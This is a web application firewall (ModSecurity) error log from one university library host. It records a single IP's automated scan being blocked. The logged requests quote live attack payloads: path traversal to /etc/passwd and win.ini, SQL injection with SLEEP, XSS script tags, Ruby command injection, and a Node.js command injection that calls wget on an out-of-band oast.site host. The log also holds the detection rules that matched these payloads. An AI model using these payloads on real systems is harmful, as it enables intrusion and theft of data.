[Tue Aug 29 11:44:07.455830 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAARphCgAAAAU"]
[Tue Aug 29 11:44:08.371207 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAfWN0kAAAAL"]
[Tue Aug 29 11:44:08.441143 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAc4Ev0AAAAP"]
[Tue Aug 29 11:44:10.608975 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAdTBKMAAAAY"]
[Tue Aug 29 11:44:13.419824 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAfcoPEAAAAa"]
[Tue Aug 29 11:44:14.445308 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAfEBxYAAAAO"]
[Tue Aug 29 11:44:16.355882 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gs4shp73ogq111.oast.site found within TX:1: cjmnbitjmimt14dgn26gs4shp73ogq111.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAcsLR0AAAAE"]
[Tue Aug 29 11:44:18.405154 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAdeQ-oAAAAQ"]
[Tue Aug 29 11:44:20.399570 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gbof3fj37c6uw5.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAe3@BQAAAAA"]
[Tue Aug 29 11:44:23.463622 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAdSZXkAAAAX"]
[Tue Aug 29 11:44:26.358324 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAfSWbQAAAAB"]
[Tue Aug 29 11:44:27.381170 2023] [:error] [pid 2021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfloTAAAAAj"]
[Tue Aug 29 11:44:29.477220 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAdQ3rkAAAAV"]
[Tue Aug 29 11:44:32.516059 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAenGhoAAAAM"]
[Tue Aug 29 11:44:35.409224 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g6g7s8nuckpgqx.oast.site found within TX:1: cjmnbitjmimt14dgn26g6g7s8nuckpgqx.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAdOedQAAAAS"]
[Tue Aug 29 11:44:35.455212 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAdQ3sEAAAAV"]
[Tue Aug 29 11:44:43.532721 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAg@AAAAAAAQ"]
[Tue Aug 29 11:44:44.383324 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAg4DbUAAAAI"]
[Tue Aug 29 11:44:47.356933 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAe3@GUAAAAA"]
[Tue Aug 29 11:44:47.664603 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAfbktQAAAAZ"]
[Tue Aug 29 11:44:48.459085 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAe3@GsAAAAA"]
[Tue Aug 29 11:44:48.484909 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAdftl8AAAAG"]
[Tue Aug 29 11:44:49.405396 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAARphG4AAAAU"]
[Tue Aug 29 11:44:50.445224 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAfg73oAAAAe"]
[Tue Aug 29 11:44:51.372958 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13w8Co-f0AAAhISOcAAAAH"]
[Tue Aug 29 11:44:51.392274 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAhISOgAAAAH"]
[Tue Aug 29 11:44:53.448714 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAfEBz0AAAAO"]
[Tue Aug 29 11:44:56.416304 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAg4Dd4AAAAI"]
[Tue Aug 29 11:45:00.977960 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zMCo-f0AAAhoHLAAAAAl"]
[Tue Aug 29 11:45:00.988888 2023] [:error] [pid 2138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAhab9EAAAAW"]
[Tue Aug 29 11:45:02.434458 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhpwOUAAAAm"]
[Tue Aug 29 11:45:02.438085 2023] [:error] [pid 2160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhwxlMAAAAt"]
[Tue Aug 29 11:45:03.406422 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAhuiw4AAAAr"]
[Tue Aug 29 11:45:05.383445 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAg@ABkAAAAQ"]
